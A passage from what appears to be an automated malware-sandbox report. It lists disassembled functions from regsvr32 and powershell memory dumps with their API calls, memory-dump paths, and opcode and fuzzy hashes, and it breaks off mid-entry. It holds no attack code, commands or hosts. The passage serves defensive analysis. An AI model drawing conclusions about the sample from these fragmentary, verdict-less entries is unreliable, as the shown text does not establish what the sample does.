                                                                    • Part of subcall function 04F8A108: __getptd_noexit.LIBCMT ref: 04F8A10B
                                                                    • Part of subcall function 04F8A108: __amsg_exit.LIBCMT ref: 04F8A118
                                                                  • __getptd.LIBCMT ref: 04F93E8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                  • String ID: csm
                                                                  • API String ID: 803148776-1018135373
                                                                  • Opcode ID: b6df51cf0bd50e8a3f4545857898d45d6830f72e6c8bdfca11c47be0234717bf
                                                                  • Instruction ID: 07c878cde64929a0ff8d92ec45e43882339806a47266621beafb02f0bf84cdb0
                                                                  • Opcode Fuzzy Hash: b6df51cf0bd50e8a3f4545857898d45d6830f72e6c8bdfca11c47be0234717bf
                                                                  • Instruction Fuzzy Hash: 33014B34C006068BFF36EF21D8406ADB7F5EF08215F54442ED8425A650CB72AD9BCF41
                                                                  Function 02643799 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 026437A8
                                                                    • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
                                                                    • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
                                                                  • __getptd.LIBCMT ref: 026437B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                  • String ID: csm
                                                                  • API String ID: 803148776-1018135373
                                                                  • Opcode ID: 232d83957bbd0d82e1ddc03cfa156672e8b489190560304b81aebacbb872713b
                                                                  • Instruction ID: fecbc4fe1f3a24d7a7ccc8a96ade3cbd0eb457cc1a1834671c09275fb5821a57
                                                                  • Opcode Fuzzy Hash: 232d83957bbd0d82e1ddc03cfa156672e8b489190560304b81aebacbb872713b
                                                                  • Instruction Fuzzy Hash: 92014B348026058FCF34AF66C480AAEBBB6AF01315F7544AED4C156760CF71E5A1CF55
                                                                  Function 6C8A0890 Relevance: 5.1, APIs: 4, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(6C869313,00000001,6C869314,?,?,?,6C89E52E,6C954010,00000000,?,6C8A41BB,00000001,?,6C8664F7), ref: 6C8A08A2
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,6C8664F7,?,?,?,?,?,?,?,00000000,?,00000000,?,6C869314), ref: 6C8A08EC
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,6C8664F7,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6C8A08F8
                                                                  • TlsGetValue.KERNEL32(00000000,6C8664F7,?,?,?,?,?,?,?,00000000,?,00000000,?,6C869314,?,?), ref: 6C8A0925
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 18d017b907ea839a4aca6ecd6d596253b9820f573ce2a86fd05372a13865d549
                                                                  • Instruction ID: dfadd056078c1c78d19757aa0d6318372334406b925d5e47a620948dd3226ee5
                                                                  • Opcode Fuzzy Hash: 18d017b907ea839a4aca6ecd6d596253b9820f573ce2a86fd05372a13865d549
                                                                  • Instruction Fuzzy Hash: 0C416B71E412149FF7304B988D40BAB7778EF81B18F180825EA159BB81DB71EC0286E9
                                                                  Function 6C85DF20 Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcpy.MSVCRT(00000000,?,000000E8), ref: 6C85E029
                                                                  • memmove.MSVCRT(?,00000000,000000E8), ref: 6C85E03A
                                                                  • memcpy.MSVCRT(?,00000001,000000E8), ref: 6C85E07C
                                                                  • memcpy.MSVCRT(?,?,000000EC), ref: 6C85E0CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$memmove
                                                                  • String ID:
                                                                  • API String ID: 1283327689-0
                                                                  • Opcode ID: bd9360b5ec95aa760c4ed2cc51bd7d3424e0bf53b0f17b6bfa8dedf76d68300f
                                                                  • Instruction ID: 195c3cb52136f26fcd239bf68f090e68426934c349c6768845df247b834b4123
                                                                  • Opcode Fuzzy Hash: bd9360b5ec95aa760c4ed2cc51bd7d3424e0bf53b0f17b6bfa8dedf76d68300f
                                                                  • Instruction Fuzzy Hash: 12514931A0421A8BDB11CF68CC417EAB7B4BF55308F08867AEC54FB782E775D9598790
                                                                  Function 6C8A0750 Relevance: 5.1, APIs: 4, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(?,6C95405C,?,5252E850,66000000,?,6C89F1B0,6C95405C,00000000,?,6C89F02D,00000000,?), ref: 6C8A0766
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,00000000,6C89F02D,00000000,?,?,?,?,?,?,6C89E128,66000000,?), ref: 6C8A07BF
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,?,00000000,6C89F02D,00000000,?,?,?,?,?,?,6C89E128,66000000), ref: 6C8A07CB
                                                                  • TlsGetValue.KERNEL32(00000000,6C89F02D,00000000,?,?,?,?,?,?,6C89E128,66000000,?,?,6C89E65D,?,?), ref: 6C8A0821
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 4912b85591f73c7dd996e81e2642d5334e87bdda541fef23af52f2e0499c735d
                                                                  • Instruction ID: 9885973aa7c7cb62a38610a798ebd8d3f8462f4e9576d494234b396407410f14
                                                                  • Opcode Fuzzy Hash: 4912b85591f73c7dd996e81e2642d5334e87bdda541fef23af52f2e0499c735d
                                                                  • Instruction Fuzzy Hash: FF3169B1901210AFE3209BB48D40FEB77A4BF5171CF054974EA099BB41EF75E80A87E5
                                                                  Function 6C903E70 Relevance: 5.1, APIs: 4, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(-00000001,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903E8B
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,?,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903ED8
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903EE4
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903F27
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 356e0de8516e246c8f1c5c6fee2e2a42a2e348497b3db3563614e0028ff2957e
                                                                  • Instruction ID: 23fb1b6f33ba0e79a72dffeced1336c8d6eaad06e577304c1dcbc563eda2c427
                                                                  • Opcode Fuzzy Hash: 356e0de8516e246c8f1c5c6fee2e2a42a2e348497b3db3563614e0028ff2957e
                                                                  • Instruction Fuzzy Hash: AF210671B022116BE7115B788C81FAA77BCBF92618F500539EB0897F80DB71D92986E5
                                                                  Function 6C904030 Relevance: 5.1, APIs: 4, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(00000017,?,00000008,00000010,?,00000000,00000000,?,?,?,00000000,?,?,00000004,00000008), ref: 6C90404B
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,?,?,00000008,00000010,?,00000000,00000000,?,?,?,00000000), ref: 6C904098
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000008,00000010,?,00000000,00000000,?,?,?,00000000), ref: 6C9040A4
                                                                  • TlsGetValue.KERNEL32(00000000,?,?,00000008,00000010,?,00000000,00000000,?,?,?,00000000,?,?,00000004,00000008), ref: 6C9040E7
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 9be1c1c674fafc82c8d7e951f57395343471e55b869fd8cf474d29bcd7352da4
                                                                  • Instruction ID: 56041502fdbba2b62bbaf5872d14516a429e01637db5d57aa2b3de0d6ef28452
                                                                  • Opcode Fuzzy Hash: 9be1c1c674fafc82c8d7e951f57395343471e55b869fd8cf474d29bcd7352da4
                                                                  • Instruction Fuzzy Hash: D2213831B02211DBE7105BA88C80BAA767DAFB260CF50413DDA04A7F81DF71C9188AE6
                                                                  Function 6C903F60 Relevance: 5.1, APIs: 4, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(00000018,00000000,00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000004,00000008), ref: 6C903F79
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,00000004,00000008,?,00000000,0000000C), ref: 6C903FD9
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,?,?,00000004,00000008,?,00000000), ref: 6C903FE5
                                                                  • TlsGetValue.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,00000004,00000008,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C904016
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: f18bbd5cd6c02126a7e02afd60c3dc750347692457972e8555422578534b479b
                                                                  • Instruction ID: 0e0e423c5b7326bc91da0872f2c3602417ba720c114c8a6e51f81b58eb110f09
                                                                  • Opcode Fuzzy Hash: f18bbd5cd6c02126a7e02afd60c3dc750347692457972e8555422578534b479b
                                                                  • Instruction Fuzzy Hash: 40213A717056116FE7108B798840F96B7BDFFA5B18F11442AEA18C7B40DBB2D82486A1
                                                                  Function 6C8F8E40 Relevance: 5.1, APIs: 4, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000001,?,6C8F9785,?), ref: 6C8F8E5E
                                                                  • memmove.MSVCRT(?,?,00000004,?,6C8F9785,?), ref: 6C8F8E78
                                                                  • GetStdHandle.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,00000000,00000001,?,?,6C8DC9EC,00000001,00000000,?), ref: 6C8F8EC3
                                                                  • GetLastError.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,00000000,00000001,?,?,6C8DC9EC,00000001,00000000,?), ref: 6C8F8ED1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandleLastmemcpymemmove
                                                                  • String ID:
                                                                  • API String ID: 2696460671-0
                                                                  • Opcode ID: 61d69faa9b363769abfaaffa7862394fa4bed0858a0c08efa69addb2e9721151
                                                                  • Instruction ID: 710a0a103310246e868556a3ca661ff3cbe89efbccc64efc1b58a4c890124555
                                                                  • Opcode Fuzzy Hash: 61d69faa9b363769abfaaffa7862394fa4bed0858a0c08efa69addb2e9721151
                                                                  • Instruction Fuzzy Hash: EF113D622052542ED320167E9D81AA77B9CDF932A8F144D2BF994CBB41E661DD09C3B1
                                                                  Function 6C86F0D0 Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(-00000001,6C954010,00000000,6C866EF6,?,?,6C86B1EF,6C954010,00000000,?,6C86BEF3), ref: 6C86F0E2
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,6C86BEF3,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C86F12C
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,6C86BEF3), ref: 6C86F138
                                                                  • TlsGetValue.KERNEL32(00000000,6C86BEF3,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C86F165
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: b7f9f38a2b199f6c72f59c5391b87fce161770dcfe28beffb96d795f2b14ae99
                                                                  • Instruction ID: 8029ab66315b061b54b58525125a66a83fd3b23352394d4b4af4360463195681
                                                                  • Opcode Fuzzy Hash: b7f9f38a2b199f6c72f59c5391b87fce161770dcfe28beffb96d795f2b14ae99
                                                                  • Instruction Fuzzy Hash: B3112EB16412146FE7324B3ACE40B9A376CFFB2A98F154821EA08DBF40DB71D80486B1

                                                                  Executed Functions

                                                                  Function 07681D08 Relevance: 9.8, Strings: 7, Instructions: 1084COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                  • API String ID: 0-1608119003
                                                                  • Opcode ID: 60dfae479998fa8761d82812dda1db58aba66e24076e7cbdd43823933afc6a78
                                                                  • Instruction ID: 12224a8cbd925f139f5f3525e265b81ce2381a917b6326bfbcbd3f5429c41f86
                                                                  • Opcode Fuzzy Hash: 60dfae479998fa8761d82812dda1db58aba66e24076e7cbdd43823933afc6a78
                                                                  • Instruction Fuzzy Hash: E08248B1B042099FCB55AB78D82066ABBE6BFC6310F1481BAD506CF351DB35DC86C7A1
                                                                  Function 02DDF3A0 Relevance: .1, Instructions: 76COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 80bed0b795b60bab0365f16098156b37c46be94f7f49419b7a518cab21989c55
                                                                  • Instruction ID: cceafa99f07ff00b312d55b96a8e53190c68d997b7f66de846d73d977eb51d2c
                                                                  • Opcode Fuzzy Hash: 80bed0b795b60bab0365f16098156b37c46be94f7f49419b7a518cab21989c55
                                                                  • Instruction Fuzzy Hash: 20210371500640DFDF05DF14D9C0B26BFA6FB88318F24C5A9E94A4E756C33AE856CBA1
                                                                  Function 02DDF39B Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                  • Instruction ID: 7c9bcf4ae48b03c27acb33a7a0c926798c7d03465fee40e5a42a9924a8c88ab3
                                                                  • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                                                  • Instruction Fuzzy Hash: 84219D76504640DFCB06CF10D9C4B16BF72FB48318F24C5A9D9494A766C33AD86ACB91
                                                                  Function 02DDD01D Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8190084715fc956b5528559203e6cebb8a1038a709874ef26d1197a436264e0
                                                                  • Instruction ID: e08bb3061acefe2d57720fea29d630b93f19c4d3215a747d7c5d8cded93b3bfc
                                                                  • Opcode Fuzzy Hash: e8190084715fc956b5528559203e6cebb8a1038a709874ef26d1197a436264e0
                                                                  • Instruction Fuzzy Hash: 1501F232009740AAEB208B29CD84B77BF98EF81324F28C52AEC480B346C379DC45C6B1
                                                                  Function 02DDD005 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 900c670f91ab6206ee36dc0f2b9bc22be8de515bd96c983633aa51601311393e
                                                                  • Instruction ID: ffcbecab59a6c3526c21fbaa77817acc8b95eda70a6ad4726d60b346d1705860
                                                                  • Opcode Fuzzy Hash: 900c670f91ab6206ee36dc0f2b9bc22be8de515bd96c983633aa51601311393e
                                                                  • Instruction Fuzzy Hash: 7001526200E7C05ED7128B258894B62BFB4DF43224F1DC1DBD8888F2A3C2695C49C772
                                                                  Function 02DDD9A7 Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4cd8fcdbdc3db34ab1b402eb3b5fffffca722fe94afbb959a7add1c3ede90251
                                                                  • Instruction ID: d3d81227ff7075626ba7a8fabe341a19e70f6ce02d7b397272e9b7538b0bda33
                                                                  • Opcode Fuzzy Hash: 4cd8fcdbdc3db34ab1b402eb3b5fffffca722fe94afbb959a7add1c3ede90251
                                                                  • Instruction Fuzzy Hash: 09F0F976200604AF9720CF4AD985C23FBADEBD4770719C55AEC4A4B715C672EC42CEA0
                                                                  Function 02DDD998 Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1808936369.0000000002DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DDD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2ddd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0dac99d681118b2fe3b1a6733e095b1b4d50920b3f9039c7f1a74b50a3a220f3
                                                                  • Instruction ID: 90f9ff34f09d00565b867922acbd933ba59c4c6e12eddc1924efcdbfc81e9b50
                                                                  • Opcode Fuzzy Hash: 0dac99d681118b2fe3b1a6733e095b1b4d50920b3f9039c7f1a74b50a3a220f3
                                                                  • Instruction Fuzzy Hash: CAF0F976104A80AFD725CF06C985D23BBBAEB85624B198499A84A5B712C671FC42CF60

                                                                  Non-executed Functions

                                                                  Function 07680560 Relevance: 6.7, Strings: 5, Instructions: 496COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.1822258832.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7680000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
